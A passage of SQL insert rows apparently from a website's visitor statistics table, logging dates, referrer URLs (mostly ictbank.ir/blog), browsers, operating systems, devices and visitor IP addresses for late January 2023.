(28085,'2023-01-24','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.191.95.122','000',0,1,0),
(28086,'2023-01-24','http://ictbank.ir/blog','Chrome','Linux','58.0.0.0','desktop','Unknown','','54.175.93.40','000',0,1,0),
(28087,'2023-01-24','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.187.166','000',0,4,0),
(28088,'2023-01-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(28089,'2023-01-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(28090,'2023-01-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(28091,'2023-01-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28092,'2023-01-24','https://www.google.dk/','Chrome','Windows','109.0.0.0','desktop','Unknown','','86.52.176.150','000',0,1,0),
(28093,'2023-01-24','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','70.35.196.237','000',0,9,0),
(28094,'2023-01-24','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','162.243.185.26','000',0,2,0),
(28095,'2023-01-24','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.106','000',0,1,0),
(28096,'2023-01-24','http://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','143.198.202.60','000',0,2,0),
(28097,'2023-01-25','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(28098,'2023-01-25','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28099,'2023-01-25','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.54','000',0,1,0),
(28100,'2023-01-25','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.210','000',0,1,0),
(28101,'2023-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28102,'2023-01-25','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,5,0),
(28103,'2023-01-25','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.157','000',0,1,0),
(28104,'2023-01-25','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(28105,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','46.0.0.0','desktop','Unknown','','185.14.56.80','000',0,5,0),
(28106,'2023-01-25','http://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','192.71.38.71','000',0,1,0),
(28107,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.42.162','000',0,2,0),
(28108,'2023-01-25','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.178.167','000',0,1,0),
(28109,'2023-01-25','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','46.32.17.122','000',0,1,0),
(28110,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(28111,'2023-01-25','https://www.google.com/','Safari','OS X','15.0','desktop','Macintosh','','134.122.58.33','000',0,1,0),
(28112,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','64.0.0.0','desktop','Unknown','','174.138.183.2','000',0,3,0),
(28113,'2023-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,4,0),
(28114,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.40.251','000',0,1,0),
(28115,'2023-01-25','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','47.31.98.18','000',0,1,0),
(28116,'2023-01-25','http://ictbank.ir/blog','Firefox','OS X','33.0','desktop','Macintosh','','207.38.88.44','000',0,5,0),
(28117,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.191.244.156','000',0,2,0),
(28118,'2023-01-25','http://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','51.89.201.226','000',0,9,0),
(28119,'2023-01-25','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(28120,'2023-01-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28121,'2023-01-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(28122,'2023-01-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(28123,'2023-01-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28124,'2023-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','212.83.180.245','000',0,2,0),
(28125,'2023-01-25','http://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(28126,'2023-01-25','http://ictbank.ir/blog','Safari','OS X','6.0.0','desktop','Macintosh','','82.80.249.214','000',0,2,0),
(28127,'2023-01-25','http://ictbank.ir/blog','Firefox','Windows','27.0','desktop','Unknown','','82.80.230.228','000',0,2,0),
(28128,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','44.211.66.114','000',0,1,0),
(28129,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','34.219.55.13','000',0,1,0),
(28130,'2023-01-25','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','44.212.56.184','000',0,1,0),
(28131,'2023-01-25','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','172.98.185.110','000',0,1,0),
(28132,'2023-01-25','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.174','000',0,1,0),
(28133,'2023-01-25','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','171.25.193.234','000',0,1,0),
(28134,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','40.0.0.0','desktop','Unknown','','185.65.134.167','000',0,4,0),
(28135,'2023-01-26','http://design-arena.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','46.166.182.101','000',0,3,0),
(28136,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.59','000',0,1,0),
(28137,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.84','000',0,1,0),
(28138,'2023-01-26','http://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(28139,'2023-01-26','http://ictbank.ir/blog','Chrome','Linux','80.0.0.0','desktop','Unknown','','65.109.140.151','000',0,1,0),
(28140,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','159.65.198.115','000',0,2,0),
(28141,'2023-01-26','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','88.255.135.210','000',0,1,0),
(28142,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.34.15','000',0,2,0),
(28143,'2023-01-26','http://ictbank.ir/blog','Firefox','Windows','109.0','desktop','Unknown','','79.50.52.136','000',0,3,0),
(28144,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','36.0.0.0','desktop','Unknown','','185.119.81.100','000',0,2,0),
(28145,'2023-01-26','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28146,'2023-01-26','http://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.150.184','000',0,1,0),
(28147,'2023-01-26','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','114.107.225.150','000',0,2,0),
(28148,'2023-01-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(28149,'2023-01-26','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.99.113.173','000',0,2,0),
(28150,'2023-01-26','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28151,'2023-01-26','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','62.216.206.139','000',0,1,0),
(28152,'2023-01-26','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','197.248.224.74','000',0,1,0),
(28153,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.220.32','000',0,1,0),
(28154,'2023-01-26','http://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(28155,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.163.106.170','000',0,2,0),
(28156,'2023-01-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(28157,'2023-01-26','http://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.157','000',0,1,0),
(28158,'2023-01-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28159,'2023-01-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(28160,'2023-01-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(28161,'2023-01-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28162,'2023-01-26','http://ictbank.ir/blog','Firefox','Windows','83.0','desktop','Unknown','','83.166.240.76','000',0,1,0),
(28163,'2023-01-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','128.199.170.115','000',0,2,0),
(28164,'2023-01-26','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','45.89.105.154','000',0,2,0),
(28165,'2023-01-26','http://ictbank.ir/blog','Chrome','OS X','79.0.0.0','desktop','Macintosh','','68.183.60.67','000',0,2,0),
(28166,'2023-01-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(28167,'2023-01-27','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.70','000',0,1,0),
(28168,'2023-01-27','http://ictbank.ir','Unknown','iOS','Unknown','mobile:smart','iPhone','','23.129.64.149','000',0,1,0),
(28169,'2023-01-27','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.223.193.80','000',0,5,0),
(28170,'2023-01-27','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28171,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(28172,'2023-01-27','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.52.38','000',0,2,0),
(28173,'2023-01-27','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','103.218.241.152','000',0,1,0),
(28174,'2023-01-27','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.230','000',0,1,0),
(28175,'2023-01-27','http://design-arena.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.220','000',0,1,0),
(28176,'2023-01-27','http://design-arena.ir/blog/','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.226','000',0,1,0),
(28177,'2023-01-27','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.203.225.60','000',0,2,0),
(28178,'2023-01-27','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','52.203.23.91','000',0,3,0),
(28179,'2023-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28180,'2023-01-27','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(28181,'2023-01-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,4,0),
(28182,'2023-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,4,0),
(28183,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','185.119.81.100','000',0,4,0),
(28184,'2023-01-27','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,2,0),
(28185,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','90.0.0.0','desktop','Unknown','','185.119.81.107','000',0,4,0),
(28186,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','184.168.115.30','000',0,5,0),
(28187,'2023-01-27','http://ictbank.ir/blog','Chrome','OS X','95.0.0.0','desktop','Macintosh','','44.193.220.153','000',0,2,0),
(28188,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.188.116.3','000',0,2,0),
(28189,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','147.182.194.179','000',0,3,0),
(28190,'2023-01-27','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.144.144.145','000',0,2,0),
(28191,'2023-01-27','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28192,'2023-01-27','http://wikisonnati.com/blog','Chrome','iOS','80.0.0.0','mobile:smart','iPhone','','78.46.216.214','000',0,2,0),
(28193,'2023-01-27','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28194,'2023-01-27','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.141.105','000',0,1,0),
(28195,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.88','000',0,1,0),
(28196,'2023-01-27','http://neginghavami.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,4,0),
(28197,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.82.69','000',0,1,0),
(28198,'2023-01-27','http://neginghavami.ir/blog','Chrome','OS X','80.0.0.0','desktop','Macintosh','','49.12.74.186','000',0,4,0),
(28199,'2023-01-27','http://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','148.153.98.52','000',0,1,0),
(28200,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.11.174.224','000',0,2,0),
(28201,'2023-01-27','http://ns1.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.157','000',0,1,0),
(28202,'2023-01-27','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.127.234.124','000',0,2,0),
(28203,'2023-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28204,'2023-01-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(28205,'2023-01-27','http://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(28206,'2023-01-27','http://neginghavami.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,2,0),
(28207,'2023-01-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28208,'2023-01-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(28209,'2023-01-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(28210,'2023-01-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28211,'2023-01-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(28212,'2023-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28213,'2023-01-27','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.121','000',0,1,0),
(28214,'2023-01-27','http://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','185.177.218.248','000',0,1,0),
(28215,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','167.172.173.167','000',0,12,0),
(28216,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','206.81.29.175','000',0,10,0),
(28217,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','161.35.25.208','000',0,11,0),
(28218,'2023-01-28','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(28219,'2023-01-28','http://neginghavami.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.229','000',0,1,0),
(28220,'2023-01-28','http://neginghavami.ir/blog/','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.232','000',0,1,0),
(28221,'2023-01-28','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','184.64.9.237','000',0,2,0),
(28222,'2023-01-28','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','34.207.194.89','000',0,2,0),
(28223,'2023-01-28','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(28224,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','46.0.0.0','desktop','Unknown','','185.119.81.107','000',0,4,0),
(28225,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','37.139.53.9','000',0,5,0),
(28226,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.61.242','000',0,2,0),
(28227,'2023-01-28','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','109.195.211.20','000',0,2,0),
(28228,'2023-01-28','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,2,0),
(28229,'2023-01-28','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,1,0),
(28230,'2023-01-28','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,1,0),
(28231,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','185.119.81.100','000',0,6,0),
(28232,'2023-01-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(28233,'2023-01-28','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Pixel','','139.99.123.180','000',0,2,0),
(28234,'2023-01-28','http://ictbank.ir/blog','Chrome','Android','106.0.0.0','mobile:smart','Nexus 5','','171.13.14.76','000',0,1,0),
(28235,'2023-01-28','http://ictbank.ir/blog','Chrome','Android','106.0.0.0','mobile:smart','Nexus 5','','171.13.14.18','000',0,1,0),
(28236,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.96.243','000',0,1,0),
(28237,'2023-01-28','http://ictbank.ir/','Opera','Linux','89.0.0.0','desktop','Unknown','','37.139.53.40','000',0,2,0),
(28238,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','50.112.42.250','000',0,2,0),
(28239,'2023-01-28','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.203.232.125','000',0,1,0),
(28240,'2023-01-28','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28241,'2023-01-28','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.65.222','000',0,1,0),
(28242,'2023-01-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.123.152','000',0,1,0),
(28243,'2023-01-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28244,'2023-01-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(28245,'2023-01-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28246,'2023-01-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(28247,'2023-01-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(28248,'2023-01-28','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','69.12.72.188','000',0,3,0),
(28249,'2023-01-28','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.198.171.191','000',0,2,0),
(28250,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','69.160.160.53','000',0,26,0),
(28251,'2023-01-29','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28252,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,6,0),
(28253,'2023-01-29','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(28254,'2023-01-29','http://wikisonnati.com/blog','Firefox','Windows','102.0','desktop','Unknown','','193.41.122.30','000',0,2,0),
(28255,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28256,'2023-01-29','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(28257,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28258,'2023-01-29','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','114.34.243.67','000',0,1,0),
(28259,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(28260,'2023-01-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28261,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','64.0.0.0','desktop','Unknown','','185.119.81.107','000',0,4,0),
(28262,'2023-01-29','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','58.19.51.217','000',0,1,0),
(28263,'2023-01-29','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,1,0),
(28264,'2023-01-29','http://wikisonnati.com','Chrome','Windows','89.0.0.0','desktop','Unknown','','102.130.127.238','000',0,1,0),
(28265,'2023-01-29','http://wikisonnati.com','Chrome','Windows','89.0.0.0','desktop','Unknown','','185.220.101.46','000',0,1,0),
(28266,'2023-01-29','https://www.google.com/','Chrome','Android','87.0.0.0','mobile:smart','Galaxy A50','','37.129.255.91','000',0,1,0),
(28267,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.120.43','000',0,2,0),
(28268,'2023-01-29','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28269,'2023-01-29','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','89.22.238.41','000',0,1,0),
(28270,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.36.197.153','000',0,1,0),
(28271,'2023-01-29','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.77','000',0,2,0),
(28272,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','212.83.180.245','000',0,2,0),
(28273,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.51.114','000',0,2,0),
(28274,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.105.47','000',0,1,0),
(28275,'2023-01-29','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','34.234.11.9','000',0,2,0),
(28276,'2023-01-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(28277,'2023-01-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,2,0),
(28278,'2023-01-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28279,'2023-01-29','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','109.195.211.20','000',0,2,0),
(28280,'2023-01-29','http://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','194.5.237.100','000',0,1,0),
(28281,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28282,'2023-01-29','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.77.66','000',0,2,0),
(28283,'2023-01-29','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(28284,'2023-01-29','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(28285,'2023-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28286,'2023-01-30','http://ictbank.ir/blog','Safari','OS X','10.0','desktop','Macintosh','','95.216.229.26','000',0,1,0),
(28287,'2023-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28288,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.82.159','000',0,2,0),
(28289,'2023-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28290,'2023-01-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','46.0.40.106','000',0,1,0),
(28291,'2023-01-30','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(28292,'2023-01-30','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(28293,'2023-01-30','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.223.193.80','000',0,5,0),
(28294,'2023-01-30','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(28295,'2023-01-30','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.185.51','000',0,3,0),
(28296,'2023-01-30','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(28297,'2023-01-30','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.209.82.29','000',0,2,0),
(28298,'2023-01-30','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(28299,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.194.126','000',0,2,0),
(28300,'2023-01-30','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(28301,'2023-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28302,'2023-01-30','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','188.142.137.44','000',0,1,0),
(28303,'2023-01-30','http://neginghavami.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.199.254.202','000',0,1,0),
(28304,'2023-01-30','http://ictbank.ir/blog','Chrome','OS X','81.0.0.0','desktop','Macintosh','','101.199.254.235','000',0,1,0),
